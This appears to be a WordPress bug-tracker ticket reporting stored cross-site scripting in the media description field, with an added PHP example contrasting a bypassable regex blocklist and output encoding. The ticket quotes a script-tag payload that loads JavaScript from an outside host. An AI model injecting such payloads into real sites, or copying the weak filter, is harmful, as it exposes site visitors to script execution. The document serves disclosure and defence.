WordPress.org

Plugin Directory

Opened 5 years ago

#1608 new defect

Stored XSS Flaw in Description Box in the Media tab

Reported by: adityabalapure
Owned by:
Priority: high
Severity: critical
Plugin: not-listed
Keywords: Stored XSS, Media
Cc:

Description

A malicious user, who may escalate privileges to gain admin rights if access controls are not practiced properly, may use Stored XSS to inject the MEDIA DESCRIPTION FIELD with malicious JavaScript.

Script Used - <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

Attached are the screenshots for Proof of Concept

media-1.png - Describes the screenshot in which a user account that has administrator rights, or may have escalated to administrator rights, may inject malicious JavaScript.

media-2.png - Describes the script being executed for all users if anyone tries to access that particular media/image.

Recommendation - The description field should be filtered for all users, even administrators.

Attachments (2)

media-1.png (125.8 KB) - added by adityabalapure 5 years ago.
media-2.png (430.0 KB) - added by adityabalapure 5 years ago.
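
The recommendation in the ticket, sketched as an added example (not code from the ticket or from WordPress): a whitespace-based blocklist leaves the reported `<SCRIPT/SRC=...>` string intact, while encoding the description on output neutralises it regardless of who stored it. The function names and the second and third sample strings are constructed for illustration.

```php
<?php
// Added example: not WordPress code. Function names are hypothetical.

// Constructed inputs; the first is the string quoted in the ticket.
$samples = [
    'ticket payload'  => '<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
    'ordinary script' => '<script src="http://example.invalid/x.js"></script>',
    'plain caption'   => 'Sunset over the bay, 5 < 6 & "quoted"',
];

// Weak: a blocklist that expects whitespace or ">" after the tag name.
// Browsers also accept "/" there, so the ticket payload is returned unchanged.
function naive_strip_script(string $html): string
{
    return preg_replace('#<script(\s[^>]*)?>.*?</script>#is', '', $html) ?? '';
}

// Fixed: treat the description as text and encode it for the HTML context
// at output time, whatever role stored it.
function render_description(string $raw): string
{
    return htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Show both treatments side by side for each stored description.
foreach ($samples as $label => $raw) {
    echo $label, "\n";
    echo "  naive filter: ", naive_strip_script($raw), "\n";
    echo "  encoded:      ", render_description($raw), "\n";
}
```

In WordPress itself the corresponding calls are `esc_html()` when printing the field and `wp_kses_post()` when saving it. Accounts holding the `unfiltered_html` capability bypass the save-time filter, so output encoding is the control that covers administrator-stored content.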
